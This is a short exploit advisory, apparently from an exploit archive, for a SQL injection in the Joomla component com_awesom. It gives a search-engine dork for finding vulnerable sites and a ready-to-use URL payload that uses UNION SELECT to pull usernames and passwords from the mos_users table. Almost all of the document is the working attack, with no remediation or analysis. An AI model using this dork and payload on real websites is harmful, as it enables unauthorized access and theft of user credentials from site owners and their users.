id: 13690
date: 11/26/2009
title: Joomla Component com_awesom SQL Injection Vulnerability
author: S@BUN
cves: 

=======================================================
Joomla Component com_awesom SQL Injection Vulnerability
=======================================================

DORKS 1: allinurl :"com_awesom"

EXPLOIT:

index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null  ,null,null,null,null/**/from/**/mos_users/*



#  0day.today [2023-03-22]  #